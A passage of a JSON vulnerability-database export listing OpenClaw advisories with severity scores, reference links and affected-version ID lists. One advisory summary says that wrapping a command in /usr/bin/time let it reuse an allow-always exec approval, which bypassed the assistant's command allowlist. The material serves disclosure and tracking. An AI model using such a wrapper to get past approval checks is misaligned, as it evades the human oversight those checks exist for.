_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-write-via-symlink-following-in-ssh-sandbox-tar-upload"},{"reference_url":"https://github.com/advisories/GHSA-fv94-qvg8-xqpw","reference_id":"GHSA-fv94-qvg8-xqpw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fv94-qvg8-xqpw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerabili
ty":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerabili
ty":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41364","GHSA-fv94-qvg8-xqpw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-carm-gpgh-wbbf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89367?format=json","vulnerability_id":"VCID-cbuu-4d6c-rben","summary":"OpenClaw B-M3: ClawHub package downloads are not enforced with integrity verification\n## Impact\n\nB-M3: ClawHub package downloads are not enforced with integrity verification.\n\nClawHub downloads could install plugin archives without enforcing archive or per-file integrity metadata.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42428","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.059","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05897","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05906","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42428"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/
E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3vvq-q2qc-7rmp","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3vvq-q2qc-7rmp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42428","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42428"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-integrity-verification-in-package-downloads","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/V
C:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-missing-integrity-verification-in-package-downloads"},{"reference_url":"https://github.com/advisories/GHSA-3vvq-q2qc-7rmp","reference_id":"GHSA-3vvq-q2qc-7rmp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3vvq-q2qc-7rmp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerabili
ty":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42428","GHSA-3vvq-q2qc-7rmp"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cbuu-4d6c-rben"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90976?format=json","vulnerability_id":"VCID-cjjd-hv92-wbfn","summary":"OpenClaw's system.run allowlist can be bypassed through an unregistered time dispatch wrapper\n## Summary\nAllow-always exec approvals did not unwrap /usr/bin/time, so an unregistered time wrapper could bypass executable binding and reuse approval state for the inner command.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 
2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `39409b6a6dd4239deea682e626bac9ba547bfb14`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/dispatch-wrapper-resolution.ts now unwraps /usr/bin/time and binds approvals to the real inner executable.\n- src/infra/exec-approvals-allow-always.test.ts ships regression coverage for time-wrapper allow-always approval bypasses.\n\nOpenClaw thanks @YLChen-007 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35666","reference_id":"","reference_type":"","scores":[{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18772","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18733","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18773","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35666"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/39409b6a6dd4239deea682e626bac9ba547bfb14","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/
UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"}],"url":"https://github.com/openclaw/openclaw/commit/39409b6a6dd4239deea682e626bac9ba547bfb14"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm9x-v7cx-7rq4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm9x-v7cx-7rq4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35666","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4
","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35666"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-unregistered-time-dispatch-wrapper","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-unregistered-time-dispatch-wrapper"},{"reference_url":"https://github.com/advisories/GHSA-qm9x-v7cx-7rq4","reference_id":"GHSA-qm9x-v7cx-7rq4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qm9x-v7cx-7rq4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCI
D-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCI
D-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCI
